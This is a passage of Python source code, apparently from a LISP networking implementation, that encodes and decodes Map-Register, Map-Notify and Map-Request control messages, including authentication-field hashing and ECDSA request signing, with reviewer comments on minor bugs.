# e-bit must be set by the ETR to indicate that the Map-Register was encrypted.
#
class lisp_map_register():
    """Encoder/decoder for the LISP Map-Register message (see format
    diagram above).  Handles the flag bits in the first longword, the
    authentication-data field (none/sha1-96/sha2-256), and the trailing
    xTR-ID/site-ID fields when the I-bit is set."""
    def __init__(self):
        self.proxy_reply_requested = False
        self.lisp_sec_present = False
        self.xtr_id_present = False
        self.map_notify_requested = False
        self.mobile_node = False
        self.merge_register_requested = False
        self.use_ttl_for_timeout = False
        self.map_register_refresh = False
        self.record_count = 0
        self.nonce = 0
        self.alg_id = 0
        self.key_id = 0
        self.auth_len = 0
        self.auth_data = 0
        self.xtr_id = 0
        self.site_id = 0
        # NOTE(review): record_count was already initialized above; this
        # second assignment is a harmless duplicate.
        self.record_count = 0
        self.sport = 0
        self.encrypt_bit = 0
        self.encryption_key_id = None
    #enddef
    def print_map_register(self):
        """Log a one-line human-readable summary of this Map-Register
        (flag letters, record count, nonce, key/alg ids, xtr/site ids)."""
        xtr_id = lisp_hex_string(self.xtr_id)
        line = ("{} -> flags: {}{}{}{}{}{}{}{}{}, record-count: " +
            "{}, nonce: 0x{}, key/alg-id: {}/{}{}, auth-len: {}, xtr-id: " +
            "0x{}, site-id: {}")
        lprint(line.format(bold("Map-Register", False), \
            "P" if self.proxy_reply_requested else "p",
            "S" if self.lisp_sec_present else "s",
            "I" if self.xtr_id_present else "i",
            "T" if self.use_ttl_for_timeout else "t",
            "R" if self.merge_register_requested else "r",
            "M" if self.mobile_node else "m",
            "N" if self.map_notify_requested else "n",
            "F" if self.map_register_refresh else "f",
            "E" if self.encrypt_bit else "e",
            self.record_count, lisp_hex_string(self.nonce), self.key_id,
            self.alg_id, " (sha1)" if (self.key_id == LISP_SHA_1_96_ALG_ID) \
            else (" (sha2)" if (self.key_id == LISP_SHA_256_128_ALG_ID) else \
            ""), self.auth_len, xtr_id, self.site_id))
    #enddef
    def encode(self):
        """Build and return the Map-Register header (first longword, nonce,
        key-id/alg-id/auth-len) with the authentication field zeroed so the
        caller can compute the hash later.  EID-records are appended by the
        caller."""
        first_long = (LISP_MAP_REGISTER << 28) | self.record_count
        if (self.proxy_reply_requested): first_long |= 0x08000000
        if (self.lisp_sec_present): first_long |= 0x04000000
        if (self.xtr_id_present): first_long |= 0x02000000
        if (self.map_register_refresh): first_long |= 0x1000
        if (self.use_ttl_for_timeout): first_long |= 0x800
        if (self.merge_register_requested): first_long |= 0x400
        if (self.mobile_node): first_long |= 0x200
        if (self.map_notify_requested): first_long |= 0x100
        # e-bit plus 3-bit encryption key-id (see "kid" in format diagram).
        if (self.encryption_key_id != None):
            first_long |= 0x2000
            first_long |= self.encryption_key_id << 14
        #endif
        #
        # Append zeroed authentication data so we can compute hash latter.
        #
        if (self.alg_id == LISP_NONE_ALG_ID):
            self.auth_len = 0
        else:
            if (self.alg_id == LISP_SHA_1_96_ALG_ID):
                self.auth_len = LISP_SHA1_160_AUTH_DATA_LEN
            #endif
            if (self.alg_id == LISP_SHA_256_128_ALG_ID):
                self.auth_len = LISP_SHA2_256_AUTH_DATA_LEN
            #endif
        #endif
        packet = struct.pack("I", socket.htonl(first_long))
        packet += struct.pack("QBBH", self.nonce, self.key_id, self.alg_id,
            socket.htons(self.auth_len))
        packet = self.zero_auth(packet)
        return(packet)
    #enddef
    def zero_auth(self, packet):
        """Splice a zeroed authentication-data field into 'packet' at the
        fixed header offset, returning the modified packet.  No-op when
        alg-id is none."""
        # Offset of the auth field: first longword + nonce/key-id/alg-id/
        # auth-len header ("QHH" and "QBBH" have the same packed size).
        offset = struct.calcsize("I") + struct.calcsize("QHH")
        auth_data = ""
        auth_len = 0
        if (self.alg_id == LISP_NONE_ALG_ID): return(packet)
        if (self.alg_id == LISP_SHA_1_96_ALG_ID):
            auth_data = struct.pack("QQI", 0, 0, 0)
            auth_len = struct.calcsize("QQI")
        #endif
        if (self.alg_id == LISP_SHA_256_128_ALG_ID):
            auth_data = struct.pack("QQQQ", 0, 0, 0, 0)
            auth_len = struct.calcsize("QQQQ")
        #endif
        packet = packet[0:offset] + auth_data + packet[offset+auth_len::]
        return(packet)
    #enddef
    def encode_auth(self, packet):
        """Splice self.auth_data (the computed hash) into 'packet' at the
        authentication-field offset and return the result."""
        offset = struct.calcsize("I") + struct.calcsize("QHH")
        auth_len = self.auth_len
        auth_data = self.auth_data
        packet = packet[0:offset] + auth_data + packet[offset + auth_len::]
        return(packet)
    #enddef
    def decode(self, packet):
        """Parse a Map-Register from 'packet'.  Returns [orig_packet,
        remaining_packet] where orig_packet has the auth field zeroed
        (for hash verification), or [None, None] on any parse error."""
        orig_packet = packet
        packet_format = "I"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return([None, None])
        first_long = struct.unpack(packet_format, packet[:format_size])
        first_long = socket.ntohl(first_long[0])
        packet = packet[format_size::]
        packet_format = "QBBH"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return([None, None])
        self.nonce, self.key_id, self.alg_id, self.auth_len = \
            struct.unpack(packet_format, packet[:format_size])
        self.auth_len = socket.ntohs(self.auth_len)
        self.proxy_reply_requested = True if (first_long & 0x08000000) \
            else False
        self.lisp_sec_present = True if (first_long & 0x04000000) else False
        self.xtr_id_present = True if (first_long & 0x02000000) else False
        self.use_ttl_for_timeout = True if (first_long & 0x800) else False
        self.map_register_refresh = True if (first_long & 0x1000) else False
        self.merge_register_requested = True if (first_long & 0x400) else False
        self.mobile_node = True if (first_long & 0x200) else False
        self.map_notify_requested = True if (first_long & 0x100) else False
        self.record_count = first_long & 0xff
        #
        # Decode e-bit and key-id for Map-Register decryption.
        #
        self.encrypt_bit = True if first_long & 0x2000 else False
        if (self.encrypt_bit):
            self.encryption_key_id = (first_long >> 14) & 0x7
        #endif
        #
        # Decode xTR-ID and site-ID if sender set the xtr_id_present bit.
        #
        if (self.xtr_id_present):
            if (self.decode_xtr_id(orig_packet) == False): return([None, None])
        #endif
        packet = packet[format_size::]
        #
        # Parse authentication and zero out the auth field in the packet.
        #
        if (self.auth_len != 0):
            if (len(packet) < self.auth_len): return([None, None])
            if (self.alg_id not in (LISP_NONE_ALG_ID, LISP_SHA_1_96_ALG_ID,
                LISP_SHA_256_128_ALG_ID)):
                lprint("Invalid authentication alg-id: {}".format(self.alg_id))
                return([None, None])
            #endif
            auth_len = self.auth_len
            if (self.alg_id == LISP_SHA_1_96_ALG_ID):
                format_size = struct.calcsize("QQI")
                if (auth_len < format_size):
                    lprint("Invalid sha1-96 authentication length")
                    return([None, None])
                #endif
                auth1, auth2, auth3 = struct.unpack("QQI", packet[:auth_len])
                auth4 = ""
            elif (self.alg_id == LISP_SHA_256_128_ALG_ID):
                format_size = struct.calcsize("QQQQ")
                if (auth_len < format_size):
                    lprint("Invalid sha2-256 authentication length")
                    return([None, None])
                #endif
                auth1, auth2, auth3, auth4 = struct.unpack("QQQQ",
                    packet[:auth_len])
            else:
                lprint("Unsupported authentication alg-id value {}".format( \
                    self.alg_id))
                return([None, None])
            #endif
            self.auth_data = lisp_concat_auth_data(self.alg_id, auth1, auth2,
                auth3, auth4)
            orig_packet = self.zero_auth(orig_packet)
            packet = packet[self.auth_len::]
        #endif
        return([orig_packet, packet])
    #enddef
    def encode_xtr_id(self, packet):
        """Append the 128-bit xTR-ID and 64-bit site-ID (byte-swapped to
        network order) to 'packet' and return it."""
        xtr_id_upper = self.xtr_id >> 64
        xtr_id_lower = self.xtr_id & 0xffffffffffffffff
        xtr_id_upper = byte_swap_64(xtr_id_upper)
        xtr_id_lower = byte_swap_64(xtr_id_lower)
        site_id = byte_swap_64(self.site_id)
        packet += struct.pack("QQQ", xtr_id_upper, xtr_id_lower, site_id)
        return(packet)
    #enddef
    def decode_xtr_id(self, packet):
        """Extract xTR-ID and site-ID from the trailing 24 bytes of
        'packet'.  Returns True on success, [None, None] when the packet
        is too short (NOTE(review): callers only test for == False)."""
        format_size = struct.calcsize("QQQ")
        if (len(packet) < format_size): return([None, None])
        packet = packet[len(packet)-format_size::]
        xtr_id_upper, xtr_id_lower, site_id = struct.unpack("QQQ",
            packet[:format_size])
        xtr_id_upper = byte_swap_64(xtr_id_upper)
        xtr_id_lower = byte_swap_64(xtr_id_lower)
        self.xtr_id = (xtr_id_upper << 64) | xtr_id_lower
        self.site_id = byte_swap_64(site_id)
        return(True)
    #enddef
#endclass
# The Map-Notify/Map-Notify-Ack message format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=4/5| Reserved | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key ID | Algorithm ID | Authentication Data Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# ~ Authentication Data ~
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Record TTL |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# R | Locator Count | EID mask-len | ACT |A| Reserved |
# e +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# c | Rsvd | Map-Version Number | EID-Prefix-AFI |
# o +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# r | EID-Prefix |
# d +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | /| Priority | Weight | M Priority | M Weight |
# | L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | o | Unused Flags |L|p|R| Loc-AFI |
# | c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | \| Locator |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_map_notify():
    """Encoder/decoder for Map-Notify and Map-Notify-Ack messages (see
    format diagram above).  Also carries the retransmission state a
    map-server keeps while waiting for a Map-Notify-Ack."""
    def __init__(self, lisp_sockets):
        # Sockets used by the caller's (re)transmit logic.
        self.etr = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.etr_port = 0
        self.retransmit_timer = None
        self.lisp_sockets = lisp_sockets
        self.retry_count = 0
        self.record_count = 0
        self.alg_id = LISP_NONE_ALG_ID
        self.key_id = 0
        self.auth_len = 0
        self.auth_data = ""
        self.nonce = 0
        self.nonce_key = ""
        self.packet = None
        self.site = ""
        self.map_notify_ack = False
        self.eid_records = ""
        self.eid_list = []
    #enddef
    def print_notify(self):
        """Log a one-line summary of this Map-Notify/Map-Notify-Ack."""
        auth_data = binascii.hexlify(self.auth_data)
        # Only show hex when the length matches the alg-id's digest size;
        # otherwise show the raw stored value.
        if (self.alg_id == LISP_SHA_1_96_ALG_ID and len(auth_data) != 40):
            auth_data = self.auth_data
        elif (self.alg_id == LISP_SHA_256_128_ALG_ID and len(auth_data) != 64):
            auth_data = self.auth_data
        #endif
        line = ("{} -> record-count: {}, nonce: 0x{}, key/alg-id: " +
            "{}{}{}, auth-len: {}, auth-data: {}")
        lprint(line.format(bold("Map-Notify-Ack", False) if \
            self.map_notify_ack else bold("Map-Notify", False),
            self.record_count, lisp_hex_string(self.nonce), self.key_id,
            self.alg_id, " (sha1)" if (self.key_id == LISP_SHA_1_96_ALG_ID) \
            else (" (sha2)" if (self.key_id == LISP_SHA_256_128_ALG_ID) else \
            ""), self.auth_len, auth_data))
    #enddef
    def zero_auth(self, packet):
        """Append a zeroed authentication-data field to 'packet' so the
        auth hash can be computed over it.  No-op when alg-id is none."""
        # Fix: initialize auth_data so an unrecognized alg-id appends
        # nothing instead of raising NameError (matches the guard style
        # of lisp_map_register.zero_auth()).
        auth_data = ""
        if (self.alg_id == LISP_NONE_ALG_ID): return(packet)
        if (self.alg_id == LISP_SHA_1_96_ALG_ID):
            auth_data = struct.pack("QQI", 0, 0, 0)
        #endif
        if (self.alg_id == LISP_SHA_256_128_ALG_ID):
            auth_data = struct.pack("QQQQ", 0, 0, 0, 0)
        #endif
        packet += auth_data
        return(packet)
    #enddef
    def encode(self, eid_records, password):
        """Build the full Map-Notify/Map-Notify-Ack packet: header, nonce,
        key/alg ids, authentication hash (computed over the whole message
        with a zeroed auth field), then the EID-records.  Stores and
        returns the packet."""
        if (self.map_notify_ack):
            first_long = (LISP_MAP_NOTIFY_ACK << 28) | self.record_count
        else:
            first_long = (LISP_MAP_NOTIFY << 28) | self.record_count
        #endif
        packet = struct.pack("I", socket.htonl(first_long))
        packet += struct.pack("QBBH", self.nonce, self.key_id, self.alg_id,
            socket.htons(self.auth_len))
        if (self.alg_id == LISP_NONE_ALG_ID):
            self.packet = packet + eid_records
            return(self.packet)
        #endif
        #
        # Run authentication hash across packet.
        #
        packet = self.zero_auth(packet)
        packet += eid_records
        hashval = lisp_hash_me(packet, self.alg_id, password, False)
        # Offset of the auth field within the header ("QHH" and "QBBH"
        # pack to the same size).
        offset = struct.calcsize("I") + struct.calcsize("QHH")
        auth_len = self.auth_len
        self.auth_data = hashval
        packet = packet[0:offset] + hashval + packet[offset + auth_len::]
        self.packet = packet
        return(packet)
    #enddef
    def decode(self, packet):
        """Parse a Map-Notify/Map-Notify-Ack from 'packet'.  Returns the
        packet with the auth field zeroed (for hash verification), the
        raw EID-records when no auth is present, or None on error."""
        orig_packet = packet
        packet_format = "I"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)
        first_long = struct.unpack(packet_format, packet[:format_size])
        first_long = socket.ntohl(first_long[0])
        self.map_notify_ack = ((first_long >> 28) == LISP_MAP_NOTIFY_ACK)
        self.record_count = first_long & 0xff
        packet = packet[format_size::]
        packet_format = "QBBH"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)
        self.nonce, self.key_id, self.alg_id, self.auth_len = \
            struct.unpack(packet_format, packet[:format_size])
        self.nonce_key = lisp_hex_string(self.nonce)
        self.auth_len = socket.ntohs(self.auth_len)
        packet = packet[format_size::]
        self.eid_records = packet[self.auth_len::]
        if (self.auth_len == 0): return(self.eid_records)
        #
        # Parse authentication and zero out the auth field in the packet.
        #
        if (len(packet) < self.auth_len): return(None)
        #
        # Fix: reject unsupported alg-ids up front; previously an unknown
        # alg-id with a non-zero auth-len fell through and referenced the
        # undefined auth words below (NameError).  Mirrors the validation
        # in lisp_map_register.decode().
        #
        if (self.alg_id not in (LISP_SHA_1_96_ALG_ID,
            LISP_SHA_256_128_ALG_ID)):
            lprint("Unsupported authentication alg-id value {}".format( \
                self.alg_id))
            return(None)
        #endif
        auth_len = self.auth_len
        if (self.alg_id == LISP_SHA_1_96_ALG_ID):
            if (auth_len < struct.calcsize("QQI")):
                lprint("Invalid sha1-96 authentication length")
                return(None)
            #endif
            auth1, auth2, auth3 = struct.unpack("QQI", packet[:auth_len])
            auth4 = ""
        #endif
        if (self.alg_id == LISP_SHA_256_128_ALG_ID):
            if (auth_len < struct.calcsize("QQQQ")):
                lprint("Invalid sha2-256 authentication length")
                return(None)
            #endif
            auth1, auth2, auth3, auth4 = struct.unpack("QQQQ",
                packet[:auth_len])
        #endif
        self.auth_data = lisp_concat_auth_data(self.alg_id, auth1, auth2,
            auth3, auth4)
        format_size = struct.calcsize("I") + struct.calcsize("QHH")
        packet = self.zero_auth(orig_packet[:format_size])
        format_size += auth_len
        packet += orig_packet[format_size::]
        return(packet)
    #enddef
#endclass
#
# Map-Request message format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=1 |A|M|P|S|p|s|m|I|Reserved |L|D| IRC | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Source-EID-AFI | Source EID Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ITR-RLOC-AFI 1 | ITR-RLOC Address 1 ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ITR-RLOC-AFI n | ITR-RLOC Address n ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / |N| Reserved | EID mask-len | EID-prefix-AFI |
# Rec +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \ | EID-prefix ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Map-Reply Record ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Mapping Protocol Data |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | xTR-ID |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# When a Map-Request is signed, the hash is over the IPv6 CGA based EID,
# the Map-Request Nonce, and the EID-record. The signature is placed in
# the Source-EID as a LCAF JSON Type string of { "source-eid" : "<cga>",
# "signature-eid" : "<cga-of-signer>", "signature" : "<sig>" }.
#
# Generating private/public key-pairs via:
#
# openssl genpkey -algorithm RSA -out privkey.pem \
# -pkeyopt rsa_keygen_bits:2048
# openssl rsa -pubout -in privkey.pem -out pubkey.pem
#
# And use ecdsa.VerifyingKey.from_pem() after reading in file.
#
# xTR-ID is appended to the end of a Map-Request when a subscription request
# is piggybacked (when self.subscribe_bit is True).
#
class lisp_map_request():
    """Encoder/decoder for the LISP Map-Request message (see format
    diagram above), including optional request signing (JSON-in-LCAF
    source-EID), per-ITR-RLOC security parameters for lisp-crypto key
    exchange, and pub-sub (subscribe) xTR-ID handling."""
    def __init__(self):
        self.auth_bit = False
        self.map_data_present = False
        self.rloc_probe = False
        self.smr_bit = False
        self.pitr_bit = False
        self.smr_invoked_bit = False
        self.mobile_node = False
        self.xtr_id_present = False
        self.local_xtr = False
        self.dont_reply_bit = False
        self.itr_rloc_count = 0
        self.record_count = 0
        self.nonce = 0
        self.signature_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.target_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.target_group = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.itr_rlocs = []
        self.keys = None
        self.privkey_filename = None
        self.map_request_signature = None
        self.subscribe_bit = False
        self.xtr_id = None
    #enddef
    def print_prefix(self):
        """Return the target EID (or (S,G) pair when a group is present)
        as a green display string."""
        if (self.target_group.is_null()):
            return(green(self.target_eid.print_prefix(), False))
        #endif
        return(green(self.target_eid.print_sg(self.target_group), False))
    #enddef
    def print_map_request(self):
        """Log a one-line summary of this Map-Request (flag letters,
        counts, nonce, EIDs) followed by one line per ITR-RLOC."""
        xtr_id = ""
        if (self.xtr_id != None and self.subscribe_bit):
            xtr_id = "subscribe, xtr-id: 0x{}, ".format(lisp_hex_string( \
                self.xtr_id))
        #endif
        line = ("{} -> flags: {}{}{}{}{}{}{}{}{}{}, itr-rloc-" +
            "count: {} (+1), record-count: {}, nonce: 0x{}, source-eid: " +
            "afi {}, {}{}, target-eid: afi {}, {}, {}ITR-RLOCs:")
        lprint(line.format(bold("Map-Request", False), \
            "A" if self.auth_bit else "a",
            "D" if self.map_data_present else "d",
            "R" if self.rloc_probe else "r",
            "S" if self.smr_bit else "s",
            "P" if self.pitr_bit else "p",
            "I" if self.smr_invoked_bit else "i",
            "M" if self.mobile_node else "m",
            "X" if self.xtr_id_present else "x",
            "L" if self.local_xtr else "l",
            "D" if self.dont_reply_bit else "d", self.itr_rloc_count,
            self.record_count, lisp_hex_string(self.nonce),
            self.source_eid.afi, green(self.source_eid.print_address(), False),
            " (with sig)" if self.map_request_signature != None else "",
            self.target_eid.afi, green(self.print_prefix(), False), xtr_id))
        keys = self.keys
        for itr in self.itr_rlocs:
            # Only the first ITR-RLOC carries the negotiated keys.
            lprint(" itr-rloc: afi {} {}{}".format(itr.afi,
                red(itr.print_address_no_iid(), False),
                "" if (keys == None) else ", " + keys[1].print_keys()))
            keys = None
        #endfor
    #enddef
    def sign_map_request(self, privkey):
        """Sign nonce+source-EID+target-EID with 'privkey' and return the
        JSON string to be carried in the source-EID LCAF field.  Also
        stores the raw signature in self.map_request_signature."""
        sig_eid = self.signature_eid.print_address()
        source_eid = self.source_eid.print_address()
        target_eid = self.target_eid.print_address()
        sig_data = lisp_hex_string(self.nonce) + source_eid + target_eid
        self.map_request_signature = privkey.sign(sig_data)
        sig = binascii.b2a_base64(self.map_request_signature)
        sig = { "source-eid" : source_eid, "signature-eid" : sig_eid,
            "signature" : sig }
        return(json.dumps(sig))
    #enddef
    def verify_map_request_sig(self, pubkey):
        """Verify this Map-Request's stored signature against the base64
        PEM 'pubkey'.  Logs pass/fail and returns True on success."""
        sseid = green(self.signature_eid.print_address(), False)
        if (pubkey == None):
            lprint("Public-key not found for signature-EID {}".format(sseid))
            return(False)
        #endif
        source_eid = self.source_eid.print_address()
        target_eid = self.target_eid.print_address()
        sig_data = lisp_hex_string(self.nonce) + source_eid + target_eid
        pubkey = binascii.a2b_base64(pubkey)
        good = True
        try:
            key = ecdsa.VerifyingKey.from_pem(pubkey)
        except:
            lprint("Invalid public-key in mapping system for sig-eid {}". \
                format(self.signature_eid.print_address_no_iid()))
            good = False
        #endtry
        if (good):
            try:
                good = key.verify(self.map_request_signature, sig_data)
            except:
                good = False
            #endtry
        #endif
        passfail = bold("passed" if good else "failed", False)
        lprint("Signature verification {} for EID {}".format(passfail, sseid))
        return(good)
    #enddef
    def encode(self, probe_dest, probe_port):
        """Build and return the Map-Request packet.  'probe_dest'/
        'probe_port' identify the RLOC-probe target so existing crypto
        keys can be reused; returns None when a configured private key
        file cannot be parsed."""
        first_long = (LISP_MAP_REQUEST << 28) | self.record_count
        first_long = first_long | (self.itr_rloc_count << 8)
        if (self.auth_bit): first_long |= 0x08000000
        if (self.map_data_present): first_long |= 0x04000000
        if (self.rloc_probe): first_long |= 0x02000000
        if (self.smr_bit): first_long |= 0x01000000
        if (self.pitr_bit): first_long |= 0x00800000
        if (self.smr_invoked_bit): first_long |= 0x00400000
        if (self.mobile_node): first_long |= 0x00200000
        if (self.xtr_id_present): first_long |= 0x00100000
        if (self.local_xtr): first_long |= 0x00004000
        if (self.dont_reply_bit): first_long |= 0x00002000
        packet = struct.pack("I", socket.htonl(first_long))
        packet += struct.pack("Q", self.nonce)
        #
        # Check if Map-Request is going to be signed. If so, encode json-string
        # in source-EID field. Otherwise, just encode source-EID with instance-
        # id in source-EID field.
        #
        encode_sig = False
        filename = self.privkey_filename
        if (filename != None and os.path.exists(filename)):
            f = open(filename, "r"); key = f.read(); f.close()
            try:
                key = ecdsa.SigningKey.from_pem(key)
            except:
                return(None)
            #endtry
            json_string = self.sign_map_request(key)
            encode_sig = True
        elif (self.map_request_signature != None):
            # Reuse a previously computed signature (e.g. on retransmit).
            sig = binascii.b2a_base64(self.map_request_signature)
            json_string = { "source-eid" : self.source_eid.print_address(),
                "signature-eid" : self.signature_eid.print_address(),
                "signature" : sig }
            json_string = json.dumps(json_string)
            encode_sig = True
        #endif
        if (encode_sig):
            lcaf_type = LISP_LCAF_JSON_TYPE
            lcaf_afi = socket.htons(LISP_AFI_LCAF)
            lcaf_len = socket.htons(len(json_string) + 2)
            json_len = socket.htons(len(json_string))
            packet += struct.pack("HBBBBHH", lcaf_afi, 0, 0, lcaf_type, 0,
                lcaf_len, json_len)
            packet += json_string
            packet += struct.pack("H", 0)
        else:
            if (self.source_eid.instance_id != 0):
                packet += struct.pack("H", socket.htons(LISP_AFI_LCAF))
                packet += self.source_eid.lcaf_encode_iid()
            else:
                packet += struct.pack("H", socket.htons(self.source_eid.afi))
                packet += self.source_eid.pack_address()
            #endif
        #endif
        #
        # For RLOC-probes, see if keys already negotiated for RLOC. If so,
        # use them so a new DH exchange does not happen.
        #
        if (probe_dest):
            if (probe_port == 0): probe_port = LISP_DATA_PORT
            addr_str = probe_dest.print_address_no_iid() + ":" + \
                str(probe_port)
            if (lisp_crypto_keys_by_rloc_encap.has_key(addr_str)):
                self.keys = lisp_crypto_keys_by_rloc_encap[addr_str]
            #endif
        #endif
        #
        # If security is enabled, put security parameters in the first
        # ITR-RLOC.
        #
        for itr in self.itr_rlocs:
            if (lisp_data_plane_security and self.itr_rlocs.index(itr) == 0):
                if (self.keys == None or self.keys[1] == None):
                    keys = lisp_keys(1)
                    self.keys = [None, keys, None, None]
                #endif
                keys = self.keys[1]
                keys.add_key_by_nonce(self.nonce)
                packet += keys.encode_lcaf(itr)
            else:
                packet += struct.pack("H", socket.htons(itr.afi))
                packet += itr.pack_address()
            #endif
        #endfor
        mask_len = 0 if self.target_eid.is_binary() == False else \
            self.target_eid.mask_len
        # Subscribe bit rides in the high bit of the record's first byte;
        # a subscribe request always carries an xTR-ID.
        subscribe = 0
        if (self.subscribe_bit):
            subscribe = 0x80
            self.xtr_id_present = True
            if (self.xtr_id == None):
                self.xtr_id = random.randint(0, (2**128)-1)
            #endif
        #endif
        packet_format = "BB"
        packet += struct.pack(packet_format, subscribe, mask_len)
        if (self.target_group.is_null() == False):
            packet += struct.pack("H", socket.htons(LISP_AFI_LCAF))
            packet += self.target_eid.lcaf_encode_sg(self.target_group)
        elif (self.target_eid.instance_id != 0 or
            self.target_eid.is_geo_prefix()):
            packet += struct.pack("H", socket.htons(LISP_AFI_LCAF))
            packet += self.target_eid.lcaf_encode_iid()
        else:
            packet += struct.pack("H", socket.htons(self.target_eid.afi))
            packet += self.target_eid.pack_address()
        #endif
        #
        # If this is a subscription request, append xTR-ID to end of packet.
        #
        if (self.subscribe_bit): packet = self.encode_xtr_id(packet)
        return(packet)
    #enddef
    def lcaf_decode_json(self, packet):
        """Decode a JSON-type LCAF from 'packet' (the signed Map-Request
        source-EID encoding), storing source-EID, signature-EID and
        signature.  Returns the remaining packet, or None on error."""
        packet_format = "BBBBHH"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)
        rsvd1, flags, lcaf_type, rsvd2, lcaf_len, json_len = \
            struct.unpack(packet_format, packet[:format_size])
        if (lcaf_type != LISP_LCAF_JSON_TYPE): return(packet)
        #
        # Do lcaf-length and json-length checks first.
        #
        lcaf_len = socket.ntohs(lcaf_len)
        json_len = socket.ntohs(json_len)
        packet = packet[format_size::]
        if (len(packet) < lcaf_len): return(None)
        if (lcaf_len != json_len + 2): return(None)
        #
        # Pull out JSON string from packet.
        #
        try:
            json_string = json.loads(packet[0:json_len])
        except:
            return(None)
        #endtry
        packet = packet[json_len::]
        #
        # Get JSON encoded afi-address in JSON, we are expecting AFI of 0.
        #
        packet_format = "H"
        format_size = struct.calcsize(packet_format)
        afi = struct.unpack(packet_format, packet[:format_size])[0]
        packet = packet[format_size::]
        if (afi != 0): return(packet)
        #
        # Store JSON data internally.
        #
        if (json_string.has_key("source-eid") == False): return(packet)
        eid = json_string["source-eid"]
        # Infer AFI from address syntax: dotted-quad IPv4 or 8-group IPv6.
        afi = LISP_AFI_IPV4 if eid.count(".") == 3 else LISP_AFI_IPV6 if \
            eid.count(":") == 7 else None
        if (afi == None):
            lprint("Bad JSON 'source-eid' value: {}".format(eid))
            return(None)
        #endif
        self.source_eid.afi = afi
        self.source_eid.store_address(eid)
        if (json_string.has_key("signature-eid") == False): return(packet)
        eid = json_string["signature-eid"]
        if (eid.count(":") != 7):
            lprint("Bad JSON 'signature-eid' value: {}".format(eid))
            return(None)
        #endif
        self.signature_eid.afi = LISP_AFI_IPV6
        self.signature_eid.store_address(eid)
        if (json_string.has_key("signature") == False): return(packet)
        sig = binascii.a2b_base64(json_string["signature"])
        self.map_request_signature = sig
        return(packet)
    #enddef
    def decode(self, packet, source, port):
        """Parse a Map-Request from 'packet' received from RLOC 'source'
